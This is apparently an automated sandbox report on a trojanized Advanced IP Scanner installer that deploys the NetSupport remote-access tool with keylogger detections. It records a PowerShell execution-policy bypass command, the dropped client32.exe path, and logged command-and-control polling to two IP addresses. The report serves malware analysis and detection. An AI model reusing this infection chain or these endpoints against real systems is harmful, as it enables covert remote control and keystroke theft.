Oct 31, 2024 18:50:27.173449993 CET	49742	80	192.168.2.4	104.26.1.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 18:48:37.054116964 CET	62233	53	192.168.2.4	1.1.1.1
Oct 31, 2024 18:48:37.084386110 CET	53	62233	1.1.1.1	192.168.2.4
Oct 31, 2024 18:48:37.214210033 CET	50020	53	192.168.2.4	1.1.1.1
Oct 31, 2024 18:48:37.230415106 CET	59607	53	192.168.2.4	1.1.1.1
Oct 31, 2024 18:48:37.233782053 CET	53	50020	1.1.1.1	192.168.2.4
Oct 31, 2024 18:48:37.241012096 CET	53	59607	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 18:48:37.054116964 CET	192.168.2.4	1.1.1.1	0x3ae4	Standard query (0)	payiki.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 18:48:37.214210033 CET	192.168.2.4	1.1.1.1	0xc72c	Standard query (0)	anyhowdo.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 18:48:37.230415106 CET	192.168.2.4	1.1.1.1	0xebab	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 18:48:37.084386110 CET	1.1.1.1	192.168.2.4	0x3ae4	No error (0)	payiki.com	151.236.16.15	A (IP address)	IN (0x0001)	false
Oct 31, 2024 18:48:37.233782053 CET	1.1.1.1	192.168.2.4	0xc72c	No error (0)	anyhowdo.com	199.188.200.195	A (IP address)	IN (0x0001)	false
Oct 31, 2024 18:48:37.241012096 CET	1.1.1.1	192.168.2.4	0xebab	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false
Oct 31, 2024 18:48:37.241012096 CET	1.1.1.1	192.168.2.4	0xebab	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false
Oct 31, 2024 18:48:37.241012096 CET	1.1.1.1	192.168.2.4	0xebab	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

151.236.16.15connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

199.188.200.195connection: keep-alivecmd=pollinfo=1ack=1

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	151.236.16.15	443	8036	C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 18:48:37.212421894 CET	218	OUT	POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	104.26.1.231	80	8036	C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 18:48:37.261919975 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Oct 31, 2024 18:48:38.257103920 CET	786	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 17:48:38 GMT Content-Type: text/html; Charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8db57a203c803abe-DFW CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: private Set-Cookie: ASPSESSIONIDCCBQAACB=OACBGJHBKFGOCIAOKEHJBOIM; path=/ cf-apo-via: origin,host X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aog5FySsZ9dQyZB%2F6nKOx%2FIUiI8FDQNNQWoV%2BfWuPMUhW8EQHNiZETNCiEpcw%2B1FD2yzoammzkuXSNxveMpCi9Ss4rtqbF6GhOaNLPVO99dhBl4IzpI9WNeUEeUaJHWiRoSjB77lDkjF7uT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a Data Ascii: f32.7767,-96.7970

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	199.188.200.195	443	8036	C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 18:48:37.462333918 CET	222	OUT	POST http://199.188.200.195/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 199.188.200.195Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Target ID:	0
Start time:	13:48:09
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Imagebase:	0xc00000
File size:	21'426'168 bytes
MD5 hash:	446C29D515104B6752C1E9DA981D4E5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:48:10
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Imagebase:	0x3f0000
File size:	3'305'472 bytes
MD5 hash:	597637EDBEBB79D482E762E238209BCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:48:32
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1"
Imagebase:	0x520000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2038454722.00000000076DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2042967524.000000000878D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:48:33
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:48:36
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Imagebase:	0x400000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.1985766789.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4190638856.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	13:48:45
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Imagebase:	0x800000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.2081672435.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2083140759.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:48:53
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\SysHelper\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
Imagebase:	0x400000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2163165064.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2164182999.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 079D07F8 Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

$^q, xrefs: 079D08BB
$^q, xrefs: 079D0893
$^q, xrefs: 079D0AB4
$^q, xrefs: 079D0AA4
$^q, xrefs: 079D08AF
4'^q, xrefs: 079D08DE
,etq, xrefs: 079D0AFC
$^q, xrefs: 079D0A55
4'^q, xrefs: 079D08D2

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: ,etq$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1206794132
Opcode ID: 1828fabc46cfa90c5c73e2c1e9ed128fff72985f73e141cf453fb5905e3e0172
Instruction ID: 59cfa2cfc73b357884906379b289f8add0243177bb7d7fc98617fb610d2803d5
Opcode Fuzzy Hash: 1828fabc46cfa90c5c73e2c1e9ed128fff72985f73e141cf453fb5905e3e0172
Instruction Fuzzy Hash: 89B124B0B0420ADFCB248F6DD444A6ABBE6FF85218F14C4AAD449CF252DB35CD85C7A1

Function 079D9020 Relevance: 5.6, Strings: 4, Instructions: 586COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079D935E
4'^q, xrefs: 079D9368
4'^q, xrefs: 079D94B8
4'^q, xrefs: 079D94C2

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 2485711046d8a1fc61ae303a8231a82c5c339d89ca86362585c309e5b4d07dfd
Instruction ID: 49db158051ff70085295a2679e208641db924e18b0d6bdbb3194b858fc6a82ec
Opcode Fuzzy Hash: 2485711046d8a1fc61ae303a8231a82c5c339d89ca86362585c309e5b4d07dfd
Instruction Fuzzy Hash: EB1278B07442558FCB11AB68D8047AEBBA6EFC2268F14C4BAD505CF252DF35ED46C3A1

Function 079D6758 Relevance: 4.6, Strings: 3, Instructions: 897COMMON

Download Yara Rule

Strings

$^q, xrefs: 079D6A26
$^q, xrefs: 079D6A1A
$^q, xrefs: 079D69D4

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 7c756b540dc19099261f679be5ce3dc5dea7451a19628ce103cbf17dc910a2b7
Instruction ID: 0ee5b7a19cb73470d885c975514e5a1e5ae0dcb13be93fa3e0a28db3219add15
Opcode Fuzzy Hash: 7c756b540dc19099261f679be5ce3dc5dea7451a19628ce103cbf17dc910a2b7
Instruction Fuzzy Hash: F05265B1B042458FCB148F78D900AAEBBE6AF85398F14C4AAD4458F362DF36DD45C7A1

Function 08958C20 Relevance: 3.3, Strings: 2, Instructions: 840COMMON

Download Yara Rule

Strings

LR^q, xrefs: 08959595
(Xcq, xrefs: 08959676

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 3895281858354aebcdd28449d6d715f7c075baaf4b08414f48719ce070d38101
Instruction ID: f373724e29ff8c84dbcf653d85158b32bdd024ffe2bb2dcbadc2e24065bed849
Opcode Fuzzy Hash: 3895281858354aebcdd28449d6d715f7c075baaf4b08414f48719ce070d38101
Instruction Fuzzy Hash: 4A729E34B00218CFDB24EB68D850BADBBB6BF85304F1181E9D949AB395DB349D85CF91

Function 079D4D10 Relevance: 2.7, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079D4DF9
4'^q, xrefs: 079D4E05

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: da90d978b15781bde7c5468459f65e1fc8377c364b897765af300e4dd1ce598e
Instruction ID: 69d0fc7a67bc06c1ef6c5bc0f017fd135a14bbadbc51b5d48ea6b5df150e98f4
Opcode Fuzzy Hash: da90d978b15781bde7c5468459f65e1fc8377c364b897765af300e4dd1ce598e
Instruction Fuzzy Hash: 207112F0B002829FCB649F68D5016AABBE9AB85258F04C47AC905CB275EF31DD41CBF1

Function 089594E8 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

LR^q, xrefs: 08959595
(Xcq, xrefs: 08959676

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 4557d3800dbdcb04e4a5e956474eb7d1617273e355325c20cd83e6b75a675a3d
Instruction ID: b6efced308ca27f8077daddb69ec7ba2c7fc676113e1a50924cd03d115e0e107
Opcode Fuzzy Hash: 4557d3800dbdcb04e4a5e956474eb7d1617273e355325c20cd83e6b75a675a3d
Instruction Fuzzy Hash: EB515A34B00218CFDB14DF68D850B9DBBB6EF88704F1145A9E9499B390DB71AD46CB91

Function 089582C8 Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

(bq, xrefs: 0895842B
(bq, xrefs: 089583FF

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: e43350509dc8524b2273c765e61bfae627f579dd8b8374d15273f8054226ab92
Instruction ID: 8083eda2fd50afbbe6cedb5d3ba83dd5d7b1dccaaa1d03552f783dffab79ce21
Opcode Fuzzy Hash: e43350509dc8524b2273c765e61bfae627f579dd8b8374d15273f8054226ab92
Instruction Fuzzy Hash: E4318234A04264CFDB19FBA9E5147AE7BE6EB89312F144069D806A7781CE744D01CB91

Function 079D09B8 Relevance: 2.6, Strings: 2, Instructions: 88COMMON

Download Yara Rule

Strings

$^q, xrefs: 079D0AA4
$^q, xrefs: 079D0A55

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: c7af2f446bde400ff3fb015aeb3bfe06e466a3d865729481e741b60b55fcf6c2
Instruction ID: 6229c8d91838d112ade5cb0fb36c7ae022dd2261b96f993752e269915906cbf1
Opcode Fuzzy Hash: c7af2f446bde400ff3fb015aeb3bfe06e466a3d865729481e741b60b55fcf6c2
Instruction Fuzzy Hash: F6315EB0A04206DFDF24CF6DC188B6AB7FABB4421CF59C4AAD4188B255D774DD84CBA1

Function 08953C68 Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop, xrefs: 08953CC5

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop
API String ID: 0-2827233032
Opcode ID: 9845397efe2bb779d1698a6acc385efb0b1722290d9c3deef51c09aac0948a6d
Instruction ID: 8e83989b1294aae21fc068007bedd96eb05081745c053bfe7af0bd32872e60e0
Opcode Fuzzy Hash: 9845397efe2bb779d1698a6acc385efb0b1722290d9c3deef51c09aac0948a6d
Instruction Fuzzy Hash: ABA1FE34B007548BCB24EF78D15846EBBF6EF89660B208A1CD8069B395DF34ED46DB44

Function 08953C90 Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop, xrefs: 08953CC5

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop
API String ID: 0-2827233032
Opcode ID: 02aa145fa2f95e76266676565b7977a41a1ac9d8be76049144c963ffc3e99dbc
Instruction ID: 86d46a5e1f762b7416aeb58279ab1105642cc9cbf8c9f27c3e1c44c5714c6679
Opcode Fuzzy Hash: 02aa145fa2f95e76266676565b7977a41a1ac9d8be76049144c963ffc3e99dbc
Instruction Fuzzy Hash: 5891FF38B003148BCB24EFB5C15846EB7F6EF89761B208A1CD8129B394DF34ED469B54

Function 08954180 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop, xrefs: 0895422F, 0895423D

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop
API String ID: 0-2827233032
Opcode ID: 156e20dc9f9a59f4b7169080fa70535d0d8b8c0b19ed196cc0ba3f679efd3f57
Instruction ID: 14f3c8913380d60d04899371e1f67f42859b2aa0e663125fb19c85cd810fde8c
Opcode Fuzzy Hash: 156e20dc9f9a59f4b7169080fa70535d0d8b8c0b19ed196cc0ba3f679efd3f57
Instruction Fuzzy Hash: 194159753216508FC754DF39D89481ABBF9FF8A62431681AAE809CB332DB71DC44CB90

Function 079D9000 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

a, xrefs: 079D9018

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: 0ceccb21fc8e3eee539397ae6650efe39bee2aab0fe26977852d1bd4183c7c81
Instruction ID: 04ae4628b397c8ab7d58c50a22dc84ed90359037d01b706aad2edd5bc51e0027
Opcode Fuzzy Hash: 0ceccb21fc8e3eee539397ae6650efe39bee2aab0fe26977852d1bd4183c7c81
Instruction Fuzzy Hash: B04119F0A043429FCB10EF64D805BA97BB6EF82268F09C0A6D9059F262C735ED45C7B1

Function 079D4CF4 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079D4DF9

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 5634ed89989a2a63f51c67de7122e4627ca276809ae15382e896c32537b241c9
Instruction ID: 34437baca3e061bc21fdbd69b7368f180408e0908c23004203ca8b2ad2b8a7f0
Opcode Fuzzy Hash: 5634ed89989a2a63f51c67de7122e4627ca276809ae15382e896c32537b241c9
Instruction Fuzzy Hash: 762104F4A00382AFCBA19E2489113BA77E99F45218F09C47ACD15DB27ADB35ED41C7B1

Function 089583FE Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

(bq, xrefs: 0895842B

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: d469de992739c2689d20f0567dd5e87e8c0d5215ecb43eb11474cbefc2cd4d96
Instruction ID: 8915ce8f9f36e6b2ffce158c7ac17cd4e308466112ef05665066b7963ca964f5
Opcode Fuzzy Hash: d469de992739c2689d20f0567dd5e87e8c0d5215ecb43eb11474cbefc2cd4d96
Instruction Fuzzy Hash: 7901F9353584A48FCB0ABBB8B52406E7BE6EBC522272440AED507C7B82CE388D01C795

Function 089541F8 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop, xrefs: 0895422F

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID: rCJOvopikYXMfiGhz8dWb+rTl9mZWgPo1csESlGcCY+UCYhjBqyqm4OHOT3XAwHuhU4sfy6RRiThWiRs/nCuCVOXqVYbgQlaQRWpG9egcafn9WE6hXvIdesm3svSdMPbop
API String ID: 0-2827233032
Opcode ID: be3e20758c3b5f91954cea0921c89b4b439cbce4a19355eec69012808fe261f4
Instruction ID: 2fd95a19a3bc94e47a7ab3f71e606a0aea862169d86a3eefe9307a586d00aa5e
Opcode Fuzzy Hash: be3e20758c3b5f91954cea0921c89b4b439cbce4a19355eec69012808fe261f4
Instruction Fuzzy Hash: 6EF0A73161ABC11FC315866AD890895BFB5BED762432943DBE004CB622D7908C80C360

Function 08957A08 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e3937f5863f5d2b9404b22b2ecfe37755e2bde1fdd3c95e5bb19ec72d7368a8
Instruction ID: ce73a3eb635b106fdd63cb5c5ea3c046ee369ed17a2b4258393183f2ef04a2a9
Opcode Fuzzy Hash: 6e3937f5863f5d2b9404b22b2ecfe37755e2bde1fdd3c95e5bb19ec72d7368a8
Instruction Fuzzy Hash: 39F13C74A00249EFCB15DF98D584AADBBF2FF88315F248559E805AB365C731EE81CB90

Function 08954555 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d382bb68c5bb5443260e4d9a9500431c849512e17c0b0f87603a0cffab8a4a06
Instruction ID: 1d675f003c8f1a8404e91ed04332456aef41e63aaee882657c1cb0e997f65da0
Opcode Fuzzy Hash: d382bb68c5bb5443260e4d9a9500431c849512e17c0b0f87603a0cffab8a4a06
Instruction Fuzzy Hash: 60014470209B90CFC717EB64E5985A9BFB0BF47728B0805AFD8858B203D7669C47D395

